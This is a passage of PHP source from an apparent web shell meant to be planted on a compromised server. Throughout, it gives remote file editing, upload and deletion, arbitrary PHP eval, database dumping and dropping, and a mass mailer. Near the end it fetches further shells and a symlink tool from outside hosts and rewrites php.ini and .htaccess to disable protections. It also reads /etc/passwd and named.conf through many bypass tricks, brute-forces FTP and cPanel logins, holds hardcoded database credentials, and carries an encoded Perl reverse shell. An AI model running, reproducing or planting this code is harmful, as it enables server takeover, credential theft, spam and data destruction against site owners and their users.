'; } } function form_mailer() { global $lenguaje; echo '
'.$lenguaje[43].':     '.$lenguaje[44].':

'.$lenguaje[45].' :

  
'.$lenguaje[3].':  
'.$lenguaje[46].':  
'; } function crawl3r() { global $lenguaje; echo '
Link:


'; if (((isset($_GET['url'])) and (!isset($_GET['b64_url']))) or (((!isset($_GET['url'])) and (isset($_GET['b64_url']))))) { if (isset($_GET['url'])) { $str = @file_get_contents($_GET['url']); $url = $_GET['url']; echo htmlentities(utf8_decode($url)); } else { $str = @file_get_contents(base64_decode($_GET['b64_url'])); $url = base64_decode($_GET['b64_url']); echo htmlentities(utf8_decode($url)); } echo '

'; if ($str) { $doc = new DOMDocument(); @$doc->loadHTML($str); $hrefs = $doc->getElementsByTagName('a'); if ($hrefs) { echo ''; $i=0; foreach($hrefs as $href) { $oki=$href->getAttribute('href'); if ((trim($oki) != '') &&!(@in_array($oki,$matches_href)) &&(trim($oki)!='/') &&(trim($oki[0])!='#') &&(substr(trim($oki),0,10)!='javascript')) { if ($oki[0] != 'h') { echo ''; $i++; } } echo '
'.$i.' ----- '; } else { echo '
'.$i.' Scan it! '; } if ($oki) { echo htmlspecialchars(utf8_decode($oki)); } else { echo ' '; } echo '
'; } } else { echo $lenguaje[96].'


'; } } } function borrrar_checkbox($dir_pwn,$directorios,$archivos) { global $lenguaje; if (isset($_POST['directorios_confirmados']) or isset($_POST['archivos_confirmados'])) { $directorios_confirmados=$_POST['directorios_confirmados']; $archivos_confirmados=$_POST['archivos_confirmados']; for ($i = 0;$i '.$lenguaje[68].'! -> '.htmlentities(stripslashes($directorios_confirmados[$i])).'

'; } else { echo 'Err0r !!! -> '.htmlentities(stripslashes($directorios_confirmados[$i])).'
'; } } for ($i = 0;$i '.$lenguaje[69].'! -> '.htmlentities(stripslashes($archivos_confirmados[$i])).'

'; } else { echo 'Err0r !!! -> '.htmlentities(stripslashes($archivos_confirmados[$i])).'
'; } } echo '
'; } else { echo '
'.$lenguaje[86].'
'; echo '
'; for ($i = 0;$i '; } for ($i = 0;$i '; } echo '
'.$dir_ok.'
'.$archivo_ok.'

'; } } function reverse_dns() { if ($_POST) { $web = $_POST['url']; if (ereg('http://',$web)) { $web=str_replace('http://','',$web); } if ($web[strlen($web)-1] == '/') { $web=substr($web,0,-1); } $ip = gethostbyname($web); $source = file_get_contents('http://www.ip-adress.com/reverse_ip/'.$ip); preg_match_all('|Whois|',$source,$sitios); echo 'Web: '.$web.'
IP : '.$ip.'
Total de sitios (Reverse DNS): '.count($sitios[1]).'

'; foreach ($sitios[1] as $site) { echo ''.htmlentities($site).'
'; } } else { echo '
Url (ej: www.google.com.tr):

'; } } function pwn_chmod($pwn) { global $lenguaje; $old=substr(sprintf('%o',@fileperms($pwn)),-4); if (is_numeric($old)) { if (isset($_POST['nuevos_permisos'])) { if (is_numeric($_POST['nuevos_permisos'])) { if (@chmod($pwn,$_POST['nuevos_permisos'])) { echo $lenguaje[90]; } else { echo $lenguaje[91]; } } else { echo $lenguaje[92]; } echo '

'; } else { echo realpath($pwn).'

'.$lenguaje[93].':

'.$lenguaje[94].':


'; } } else { echo $lenguaje[89].'

'; } } if (isset($_GET['id'])) { $id_menu=$_GET['id']; } else { $id_menu='dir'; } if ($id_menu == 'icono') { mostrar_iconos($_GET['tipo']); exit(); } if (($id_menu != 'phpinfo') &&($id_menu!='proxy') &&($id_menu != 'fdown') &&($id_menu!='dump3r')) { $homedir=getcwd(); if (isset($_GET['d'])) { $dir=realpath($_GET['d']); } css(); header_index(); if ($_GET[id]=='reverse'){ $site = "$_GET[site]"; $kaynak = file_get_contents("http://whatisonip.com/domain-info/$site"); preg_match_all('##si',$kaynak,$kursat); foreach($kursat[1] as $cem) { echo str_replace('?','',$cem).'
'; } } $site = getenv('HTTP_HOST'); echo "Sunucu reverse yap:$site"; echo '
'.$lenguaje[52].': '.gethostbyname($_SERVER['HTTP_HOST']).' | '.$lenguaje[53].': '.$_SERVER['REMOTE_ADDR'].' | '; echo 'cURL: '; if(function_exists('curl_version')) { echo ''.$lenguaje[54].' | '; } else { echo ''.$lenguaje[55].' | '; } echo 'MySQL: '; if(function_exists('mysql_connect')) { echo ''.$lenguaje[54].' | '; } else { echo ''.$lenguaje[55].' | '; } echo 'MSSQL: '; if(function_exists('mssql_connect')) { echo ''.$lenguaje[54].' | '; } else { echo ''.$lenguaje[55].' | '; } echo 'PostgreSQL: '; if(function_exists('pg_connect')) { echo ''.$lenguaje[54].' | '; } else { echo ''.$lenguaje[55].' | '; } echo 'Perl: '; if (c0d3_ex3c('perl -h',$dir)) { echo ''.$lenguaje[54].' | '; } else { echo ''.$lenguaje[55].' | '; } echo 'Oracle: '; if(function_exists('ocilogon')) { echo ''.$lenguaje[54].''; } else { echo ''.$lenguaje[55].''; } echo '
'.$lenguaje[56].': '.disable_functions().'
'; echo '
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ '; } if (($id_menu == 'dir') or (!$id_menu)) { if (trim($dir)=='') { $dir = getcwd(); } listar_archivos($dir); } elseif (($id_menu == 'a_edit') &&(!trim($_GET['d']) == '') &&(!trim($_GET['a']) == '')) { echo '


'.$lenguaje[60].':
fread - readfile - file_get_contents


'; if (isset($_POST['c0d3'])) { $fopen=@fopen(realpath($dir.'/'.$_GET['a']),'w+'); $pwz=@fwrite($fopen,stripslashes($_POST['c0d3'])); @fclose($fopen); if($pwz) { echo 'OK !!! -> '.$lenguaje[61].'
'; } else { echo 'Err0r !!! -> '.$lenguaje[62].'
'; } } echo '
'; } elseif ($id_menu == 'phpinfo') { phpinfo(); } elseif ($id_menu == 'php_exec') { if (isset($_POST['c0d3_3x3c'])) { @chdir($dir); echo '

'; } echo $lenguaje[63].'


'; } elseif (($id_menu == 'upload_fil3') &&(isset($_FILES['uploadfile']))) { global $_FILES; global $dir; $uploadfile = $_FILES['uploadfile']; if (!empty($uploadfile['tmp_name'])) { if (empty($uploadfilename)) { $destin = $uploadfile['name']; } else { $destin = $userfilename; } if (!move_uploaded_file($uploadfile['tmp_name'],$dir.'/'.$destin)) { echo $lenguaje[64].' '.$uploadfile['name'].' ('.$lenguaje[65].'"'.$uploadfile['tmp_name'].'" '.$lenguaje[66].' '.$dir.'"!
'; } else { echo ''.$lenguaje[67].' ("'.$uploadfile['name'].'" '.$lenguaje[66].' -> '.$dir.')

'; } } listar_archivos($dir); } elseif ($id_menu == 'f0rm_exec') { f0rm_exec($dir); } elseif ($id_menu == 'c0d3_3x3c') { f0rm_exec($dir); echo '
'; } elseif ($id_menu == 'upload_fil3') { echo ''.htmlentities($dir).'

'; upload_file($dir); } elseif (($id_menu == 'rmdir') &&(!trim($_GET['d1r']) == '')) { if (isset($_POST['rm_ok'])) { $rm_dir=rm_items_pwn(realpath($_GET['d1r'].'/')); if($rm_dir) { echo ''.$lenguaje[68].'! -> '.htmlentities(stripslashes($_GET['d1r'])).'

'; } else { echo 'Err0r !!! -> '.htmlentities(stripslashes($_GET['d1r'])).'
'; } listar_archivos($dir); } else { echo $lenguaje[88].' '.htmlentities(stripslashes($_GET['d1r'])).' ?



'; } } elseif (($id_menu == 'rm_file') &&(!trim($_GET['fil3']) == '')) { if ((isset($_POST['rm_ok'])) &&($_POST['rm_ok']==1)) { $unlink_fil3=@unlink($_GET['fil3']); if($unlink_fil3) { echo ''.$lenguaje[69].'! -> '.htmlentities(stripslashes($_GET['fil3'])).'

'; } else { echo 'Err0r !!! -> '.htmlentities(stripslashes($_GET['fil3'])).'

'; } listar_archivos($dir); } else { echo $lenguaje[87].' '.htmlentities(stripslashes($_GET['fil3'])).' ?



'; } } elseif (($id_menu == 'mkdir') &&(!trim($_GET['d']) == '')) { if (isset($_POST['dir_name'])) { $mkdir_f=@mkdir($dir.'/'.trim($_POST['dir_name'])); if($mkdir_f) { echo ''.$lenguaje[70].'! -> '.htmlentities($_POST['dir_name']).'

'; } else { echo 'Err0r !!!

'; } } else { echo '
'.$lenguaje[71].':
'; } listar_archivos($dir); } elseif (($id_menu == 'mkfile') &&(isset($_GET['d']))) { if (isset($_POST['fil3_name'])) { $fopen=@fopen($dir.'/'.$_POST['fil3_name'],'w+'); @fwrite($fopen,stripslashes($_POST['fil3_content'])); @fclose($fopen); if($fopen) { echo ''.$lenguaje[73].'! -> '.htmlentities($_POST['fil3_name']).'

'; } else { echo 'Err0r!!!

'; } listar_archivos($dir); } else { echo '
'.$lenguaje[74].':

'; } } elseif (($id_menu == 'fdown') &&(!trim($_GET['fil3_down']) == '')) { if (!trim($_GET['fil3_path'])=='') { $fil3_down=str_replace(' ','_',$_GET['fil3_down']); $fil3_path=$_GET['fil3_path']; $fp = @fopen($fil3_path,'rb'); header('Content-Disposition: attachment; filename='.$fil3_down); header('Content-Length: '.filesize($fil3_path)); fpassthru($fp); @fclose($fp); } else { $homedir=getcwd(); $dir=realpath($_GET['d']); css(); header_index(); echo $lenguaje[76].'

'; echo ''.$lenguaje[77].''; } } if ($id_menu=='log_mysql') { if ((!$_GET['userm']=='') &&(!$_GET['hostm']=='')) { if (post_form_mysql($_GET['hostm'],$_GET['userm'],$_GET['passm'])) { echo '
'.$lenguaje[78].':

'.$lenguaje[79].'
'.$lenguaje[80].'
'; } else { echo $lenguaje[81]; } } else { echo 'Error
'; } } elseif ($id_menu=='listar_dbs') { if (post_form_mysql($hostm,$userm,$passm)) { listar_dbs(); } else { echo $lenguaje[81]; } } elseif ($id_menu=='list_tb') { if (post_form_mysql($hostm,$userm,$passm)) { listar_tbs($_GET['dbname']); } else { echo $lenguaje[81]; } } elseif (($id_menu=='ver_schema') &&(!$_GET['tbname']=='') &&(!$_GET['db']=='')) { if (post_form_mysql($hostm,$userm,$passm)) { ver_schema($_GET['tbname'],$_GET['db']); } else { echo $lenguaje[81]; } } elseif (($id_menu=='mostrar_datos') &&(!$_GET['tbname']=='')) { if (post_form_mysql($hostm,$userm,$passm)) { echo ''.$lenguaje[25].'

'; $paginaz=$_GET[pag]; if (trim($paginaz)=='') { $paginaz=0; } if (is_numeric($paginaz)) { paginar($_GET['tbname'],$_GET['db']); echo '
'; mostrar_datos($_GET['tbname'],$_GET['db'],$paginaz,30); } } else { echo $lenguaje[81]; } } elseif (($id_menu=='dump3r') &&(isset($_GET['db']))) { if (isset($_GET['tablename'])) { dump3r($userm,$passm,$hostm,$_GET['db'],$_GET['tablename']); } else { dump3r($userm,$passm,$hostm,$_GET['db'],''); } } elseif (($id_menu=='drop_db') &&(!$_GET['dbname']=='')) { if (post_form_mysql($hostm,$userm,$passm)) { drop_db($_GET['dbname']); } else { echo $lenguaje[81]; } } elseif (($id_menu=='drop_tb') &&(!$_GET['dbname']=='') &&(!$_GET['tbname']=='')) { if (post_form_mysql($hostm,$userm,$passm)) { drop_tb($_GET['tbname'],$_GET['tbname']); } else { echo $lenguaje[81]; } } elseif ($id_menu=='mysql_login') { login_form_mysql(); } elseif ($id_menu=='mail3r') { if (!$_POST) { form_mailer(); } else { form_mailer(); $paratal_emails = split(" ",$_POST['maillist']); $count_emails = count($paratal_emails); for($x=0;$x<$count_emails;$x++) { $para = $paratal_emails[$x]; if ($para) { $contenido = ereg_replace('&email&',$para,$_POST['contenido']); $titulo = ereg_replace('&email&',$para,$_POST['titulo']); $header = "From: $_POST[nombre] <$_POST[email]> "; $header .= "MIME-Version: 1.0 "; $header .= "Content-Type: text/html "; $header .= "Content-Transfer-Encoding: 8bit "; $header .= "$contenido "; if(mail($para,$titulo,'',$header)) { print ''.$para.' -->> '.$lenguaje[82].'
'; } else { echo ''.$para.' -->> '.$lenguaje[83].'
'; } } flush(); ob_flush(); } echo 'Fin :D'; } } elseif ($id_menu=='crawl3r') { crawl3r(); } elseif ($id_menu=='checkbox_form') { if ($_POST['menu_dirs'] == 'borrar') { if ((isset($_POST['directorios_confirmados'])) or (isset($_POST['archivos_confirmados'])) or (isset($_POST['directorios'])) or (isset($_POST['archivos']))) { @borrrar_checkbox(realpath($_POST['dir']),$_POST['directorios'],$_POST['archivos']); } else { echo $lenguaje[95].'

'; } } } elseif (($id_menu=='pwn_chmod') &&(isset($_GET['pwnd']))) { pwn_chmod($_GET['pwnd']); } elseif ($id_menu=='reverse_dns') { reverse_dns(); } if (($id_menu!='phpinfo') &&($id_menu!='fdown') &&($id_menu!='dump3r') &&($id_menu!='proxy')) { echo '
'; } if ($_GET[id]=='info'){ phpinfo(); } if ($_GET[id]=='phpini'){ $File = 'php.ini'; $Handle = fopen($File,'w'); $Data = "safe_mode = off "; fwrite($Handle,$Data); $Data = "disable_functions = NONE "; fwrite($Handle,$Data); print 'Baþarýlý!!'; fclose($Handle); } if ($_GET[id]=='get'){ $file = file_get_contents('http://kordonfilm.com/priv/Siyanur5xFull.txt'); $b = fopen('Siyanur5x.php','w'); fwrite($b,$file); fclose($b); print 'Baþarýlý ! '; } if ($_GET[id]=='angel'){ $file = file_get_contents('http://kordonfilm.com/priv/4ngel.txt'); $b = fopen('angel.php','w'); fwrite($b,$file); fclose($b); print 'Baþarýlý ! '; } if ($_GET[id]=='passwd'){ $output = shell_exec('cat /etc/passwd > passwd.txt'); echo 'Baþarýlý ! passwd.txt'; } if ($_GET[id]=='usr'){ $output = shell_exec('ls /var/mail > users.txt'); echo 'Baþarýlý ! users.txt'; } if ($_GET[id]=='hta'){ $File = '.htaccess'; $Handle = fopen($File,'w+'); $Data = ' FucKFilterEngine Off FucKFilterScanPOST Off FucKFilterCheckURLEncoding Off FucKFilterCheckUnicodeEncoding Off '; fwrite($Handle,$Data); print 'Baþarýlý!!'; fclose($Handle); } if ($_GET[id]=='cgitelnet'){ $kokdosya = '.htaccess'; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi ,'w') or die ('Dosya açýlamadý!'); $metin = 'Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .truy AddHandler cgi-script .truy AddHandler cgi-script .truy'; fwrite ( $dosya ,$metin ) ; fclose ($dosya); $file = fopen('mectruy.truy','w+'); $sa=file_get_contents('http://firmareklam.net/box/cgitelnet.txt'); $write = fwrite ($file ,$sa); fclose($file); if ($write) { echo "mectruy.truy adýnda Cgitelnet oluþturuldu.
.htaccess .truy uzantýya destek verecek þekilde düzenlendi
Telnet giriþ þifresimectruy
"; } else {echo'"error"';} $chm = chmod('mectruy.truy',0755); if ($chm == true){ echo 'Chmod 755 olarak ayarlandý'; }else{ echo 'chmod verilemedi'; } } if ($_GET[id]=='tmplink'){ mkdir('abc'); chdir('abc'); mkdir('etc'); chdir('etc'); mkdir('passwd'); chdir('..'); mkdir('abc'); chdir('abc'); mkdir('abc'); chdir('abc'); mkdir('abc'); chdir('abc'); chdir('..'); chdir('..'); chdir('..'); chdir('..'); symlink('abc/abc/abc/abc','tmplink'); symlink('tmplink/../../../etc/passwd','exploit'); unlink('tmplink'); mkdir('tmplink'); echo 'Tmplink oluþturuldu tmplink - abc'; } if ($_GET[id]=='php44'){ if ($_GET[id]=='php4'){ }ELSE{ $action = '?a=php4'; echo "
"; $r1s = fopen('.htaccess','w+'); fwrite($r1s,' ForceType application/x-httpd-php4 '); echo 'sistem þuanda PHP4
'; exit; } } if ($_GET[id]=='perm'){ @mkdir('anjiyo'); @chdir('anjiyo'); @exec('curl http://kordonfilm.com/priv/ln.zip -o ln.zip'); @exec('unzip ln.zip'); @exec('chmod 755 ln'); echo '[+] Dizin [ anjiyo ] adýyla oluþturuldu .
'; echo '[+] Dizin deðiþtirildi .
'; $file3 = 'Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3); if ($fw3) { echo '[+] .htaccess yüklendi .
'; } else { echo '[+] Permission izin vermiyor .htaccess oluþturulamadý !
'; } @fclose($fp3); $lines3=@file('/etc/passwd'); if (!$lines3) { $authp = @popen('/bin/cat /etc/passwd','r'); $i = 0; while (!feof($authp)) $aSonuç[$i++] = fgets($authp,4096); $lines3 = $aSonuç; @pclose($authp); } if (!$lines3) { echo "[+] Can't Read /etc/passwd File .
"; echo "[+] Can't Make The Users Shortcuts .
"; echo '[+] Finish !
'; } else { foreach($lines3 as $line_num3=>$line3){ $sprt3=explode(':',$line3); $user3=$sprt3[0]; @exec('./ln -s /home/'.$user3.'/public_html '.$user3); } echo '[+] Users Shortcut Created .
'; echo '[+] Finish !
'; } } if ($_GET[id]=='namedbypass'){ $conf['groups'] = 1; $conf['accounts'] = array(); $MySQL['host'] = '94.73.146.248'; $MySQL['user'] = 'cihaz'; $MySQL['pass'] = '00235154'; $MySQL['db'] = 'paketleme'; $IsCallableExt = create_function('$ext',' // function IsCallableExt($ext) // { echo "Deneniyor via {$ext} extension..."; // Check whether this extension can be used if ( @extension_loaded($ext) ) { echo "extension loaded, Deneniyor..."; $ext = 1; // YAY, it has already been enabled! } else { echo "extension is off. Deneniyor to load {$ext} extension..."; // We must try to enable it! if ( is_callable("dl") ) { @dl((PHP_SHLIB_SUFFIX === "dll" ? "php_" : "").$ext.".".PHP_SHLIB_SUFFIX); } // Check whether it worked if ( @extension_loaded("posix") ) { $ext = 1; // YAY, it worked! } } // } '); @ini_restore('safe_mode');@ini_set('safe_mode',0); @ini_restore('open_basedir');@ini_set('open_basedir',''); @ini_restore('disable_functions');@ini_set('disable_functions',''); if ( is_callable('ini_get') &&ini_get('error_reporting') ) { $conf['safe_mode'] = ini_get('safe_mode'); } echo 'Safe-Mode is '.($conf['safe_mode'] ?'on': 'off')."
"; echo 'Deneniyor via backtick operator...'; if ( !$conf['safe_mode'] ) { $passwd = `cat /etc/named.conf`; if ( $passwd ) { die("DONE!



".nl2br($passwd)); } } echo "failed.
Deneniyor via system()...";$x = ''; if ( @system('ls',$x) ) { system('cat /etc/named.conf',$passwd); if ( $passwd ) { die("DONE!



".nl2br($passwd)); } } echo "failed.
Deneniyor via shell_exec()..."; if ( @shell_exec('ls') ) { $passwd = shell_exec('cat /etc/named.conf'); if ( $passwd ) { die("DONE!



".nl2br($passwd)); } } echo "failed.
Deneniyor via readfile()..."; if ( @readfile('/etc/named.conf') ) { die(); } echo "failed.
Deneniyor via file_get_contents()..."; if ( @is_readable('/etc/named.conf') ) { $passwd = file_get_contents('/etc/named.conf'); if ( $passwd ) { die("DONE!



".nl2br($passwd)); } } echo "failed.
Deneniyor via copy()..."; if ( is_callable('copy') ) { if ( @copy('compress.zlib:///etc/named.conf',dirname($_SERVER['SCRIPT_FILENAME']).'/file.txt') ) { echo 'go to: '.dirname($_SERVER['SCRIPT_FILENAME']).'/file.txt'; } } echo "failed.
Deneniyor via CURL..."; if ( is_callable('curl_init') &&is_callable('curl_exec') ) { $passwd = curl_init("file:///etc/named.conf".'index.php'); if ( curl_exec($passwd) ) { var_dump(curl_exec($passwd));die(); } } echo "failed.
"; if ( $IsCallableExt('posix') ) { echo "done.
Deneniyor via posix_getpwuid()..."; if ( is_callable('posix_getpwuid') ) { $passwd = array(); for ( $i=0;$i<5000;$i++) { $line = @posix_getpwuid($i); if ( $line ) { $passwd[$i] = $line; } } if ( count($passwd) ) { die(implode("
",$passwd)); } } echo "failed.
Deneniyor via posix_getgrgid()..."; if ( $conf['groups'] &&is_callable('posix_getgrgid') ) { $passwd = array(); for ( $i=0;$i<5000;$i++) { $line = @posix_getgrgid($i); if ( $line ) { $passwd[$i] = $line; } } if ( count($passwd) ) { die(implode("
",$passwd)); } } echo "failed.
Deneniyor via posix_getpwnam()..."; if ( is_callable('posix_getpwnam') ) { $passwd = array(); foreach ( $conf['accounts'] as $account ) { $passwd[$account] = posix_getpwnam($account); } if ( count($passwd) ) { die(implode("
",$passwd)); } } echo "failed.
Deneniyor via posix_getgrnam()..."; if ( $conf['groups'] &&is_callable('posix_getgrnam') ) { $passwd = array(); foreach ( $conf['accounts'] as $account ) { $passwd[$account] = posix_getgrnam($account); } if ( count($passwd) ) { die(implode("
",$passwd)); } } } echo "failed.
"; echo 'Deneniyor via MySQL (LOCAL-INFILE)...'; if ( $MySQL['host'] &&$MySQL['user'] &&$MySQL['pass'] &&$MySQL['db'] ) { mysql_connect($MySQL['host'],$MySQL['user'],$MySQL['pass']); mysql_select_db($MySQL['db']); mysql_query('CREATE TABLE adskfjlsdjf (a varchar(1024))'); mysql_query("LOAD DATA LOCAL INFILE '/etc/named.conf' INTO TABLE adskfjlsdjf"); $Query = mysql_query('SELECT a FROM adskfjlsdjf'); if ( mysql_num_rows($Query) ) { while ( $Row = mysql_fetch_row($Query) ) { echo implode('',$Row)."
"; } die(); } } echo "failed.
"; if ( $IsCallableExt('perl') ) { $perl = new perl(); die($perl->eval("system('cat /etc/named.conf')")); } echo "failed.
"; if ( $IsCallableExt('ionCube Loader') ) { $passwd = @ioncube_read_file('/etc/named.conf'); if ( $passwd ) { die(nl2br($passwd)); } } echo "failed.
"; if ( $IsCallableExt('python') ) { $passwd = python_eval(" import os pwd = os.getcwd() print pwd os.system('cat /etc/named.conf') "); if ( $passwd ) { die(nl2br($passwd)); } } echo "failed.
"; echo '

Unable to read /etc/named.conf, nothing worked.
'; } if ($_GET[id]=='passwd1'){ for($uid=0;$uid<2000;$uid++){ $nothing = posix_getpwuid($uid); if (!empty($nothing)) { while (list ($key,$val) = each($nothing)){ print "$val:"; } print '
'; } } } if ($_GET[id]=='yukle'){ echo '
'; echo '
'; if( $_POST['_upl'] == 'Upload') { if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo 'Yükleme baþarýlý !!!

';} else {echo 'Yükleme baþarýsýz !!!

';} } echo ''; } if ($_GET[id]=='pg'){ echo "
"; echo "
"; echo '
'; ob_start(); function StrToNum($Str,$Check,$Magic) { $Int32Unit = 4294967296; $length = strlen($Str); for ($i = 0;$i <$length;$i++) { $Check *= $Magic; if ($Check >= $Int32Unit) { $Check = ($Check -$Int32Unit * (int) ($Check / $Int32Unit)); $Check = ($Check <-2147483648) ?($Check +$Int32Unit) : $Check; } $Check += ord($Str{$i}); } return $Check; } function HashURL($String) { $Check1 = StrToNum($String,0x1505,0x21); $Check2 = StrToNum($String,0,0x1003F); $Check1 >>= 2; $Check1 = (($Check1 >>4) &0x3FFFFC0 ) |($Check1 &0x3F); $Check1 = (($Check1 >>4) &0x3FFC00 ) |($Check1 &0x3FF); $Check1 = (($Check1 >>4) &0x3C000 ) |($Check1 &0x3FFF); $T1 = (((($Check1 &0x3C0) <<4) |($Check1 &0x3C)) <<2 ) |($Check2 &0xF0F ); $T2 = (((($Check1 &0xFFFFC000) <<4) |($Check1 &0x3C00)) <<0xA) |($Check2 &0xF0F0000 ); return ($T1 |$T2); } function CheckHash($Hashnum) { $CheckByte = 0; $Flag = 0; $HashStr = sprintf('%u',$Hashnum) ; $length = strlen($HashStr); for ($i = $length -1;$i >= 0;$i --) { $Re = $HashStr{$i}; if (1 === ($Flag %2)) { $Re += $Re; $Re = (int)($Re / 10) +($Re %10); } $CheckByte += $Re; $Flag ++; } $CheckByte %= 10; if (0 !== $CheckByte) { $CheckByte = 10 -$CheckByte; if (1 === ($Flag %2) ) { if (1 === ($CheckByte %2)) { $CheckByte += 9; } $CheckByte >>= 1; } } return '7'.$CheckByte.$HashStr; } function getpagerank($url) { $query='http://toolbarqueries.google.com/tbr?client=navclient-auto&hl=en&ch='.CheckHash(HashURL($url)).'&features=Rank&q=info:'.$url.'&num=100&filter=0'; $data=file_get_contents_curl($query); $pos = strpos($data,'Rank_'); if($pos === false){}else{ $pagerank = substr($data,$pos +9); return $pagerank; } } function file_get_contents_curl($url) { $ch = curl_init(); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,$url); $data = curl_exec($ch); curl_close($ch); return $data; } if(!$_POST['site']==''){ $site = explode(" ",$_POST['site']); foreach($site as $sites){ $sites = trim($sites); $pr = getPageRank($sites); echo $sites.' => '.$pr.'
'; ob_flush(); flush(); } } } if ($_GET[id]=='eval'){ $code=stripslashes($_POST['code']); echo '

Eval PHP(aslýnda en etkili bypass methodlarýndan birisidir)





'; } if ($_GET[id]=='symlist'){ $mk = @mkdir('sym',0777); $htcs = "Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any"; $f =@fopen ('sym/.htaccess','w'); @fwrite($f ,$htcs); $sym = @symlink('/','sym/root'); $pg = basename('index.php'); $d00m = @file('/etc/named.conf'); if(!$d00m) { die ('

named.conf Dosyasý okunamýyor Manuel symlink deneyiniz
'); } else { echo "
"; foreach($d00m as $dom){ if(eregi('zone',$dom)){ preg_match_all('#zone "(.*)"#',$dom,$domsws); flush(); if(strlen(trim($domsws[1][0])) >2){ $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domsws[1][0])); $site = $user['name'] ; @symlink('/','sym/root'); $site = $domsws[1][0]; $ir = 'ir'; $il = 'il'; if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) { $site = "
".$domsws[1][0].'
'; } echo " "; flush(); } } } } } else { $pfile = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink']; if ($symlink) { @symlink("$pfile","sym/$symfile"); echo '
'.$symfile.''; exit; } } if ($_GET[id]=='manuelsym'){ echo ' Manuel Symlink bölümü







'; $pfile = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink']; if ($symlink) { @symlink("$pfile","sym/$symfile"); echo '
'.$symfile.''; exit; } } if ($_GET[id]=='cpanel'){ @ini_set('memory_limit',1000000000000); $connect_timeout=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; $page = $_GET['page']; if($target == ''){ $target = 'localhost'; } @ini_set('memory_limit',1000000000000); $connect_timeout=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; if($target == ''){ $target = 'localhost'; } print "


DomainlerUserssymlink
'.$site.'
'.$user['name']." symlink
Host :


Kullanýcý adlarý

Þifre listesi


Options : cPanel ftp

"; function ftp_check($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"ftp://$host"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC); curl_setopt($ch,CURLOPT_FTPLISTONLY,1); curl_setopt($ch,CURLOPT_USERPWD,"$user:$pass"); curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout); curl_setopt($ch,CURLOPT_FAILONERROR,1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print ' Hata : Süre dýþý kaldýn , tekrar dene !'; exit;} elseif ( curl_errno($ch) == 0 ){ print "[ user@aria-security.com ]# Saldýrý baþarýlý , bulunan kullanýcý adý , $user ve Þifre , $pass
";}curl_close($ch);} function cpanel_check($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://$host:2082"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC); curl_setopt($ch,CURLOPT_USERPWD,"$user:$pass"); curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout); curl_setopt($ch,CURLOPT_FAILONERROR,1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print ' Error : Connection timed out , make confidence about validation of target !'; exit;} elseif ( curl_errno($ch) == 0 ){ print " Saldýrý baþarýlý , bulunan kullanýcý adý , $user ve Þifre , $pass
";}curl_close($ch);} if(isset($submit) &&!empty($submit)){ $userlist = explode (" ",$users ); $passlist = explode (" ",$pass ); print ' Saldýrý baþladý ...
'; foreach ($userlist as $user) { $_user = trim($user); foreach ($passlist as $password ) { $_pass = trim($password); if($option == 'ftp'){ ftp_check($target,$_user,$_pass,$connect_timeout); } if ($option == 'cpanel') { cpanel_check($target,$_user,$_pass,$connect_timeout); } } } } } if ($_GET[id]=='bc'){ $bc_perl='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=='; echo '

Back Connecting

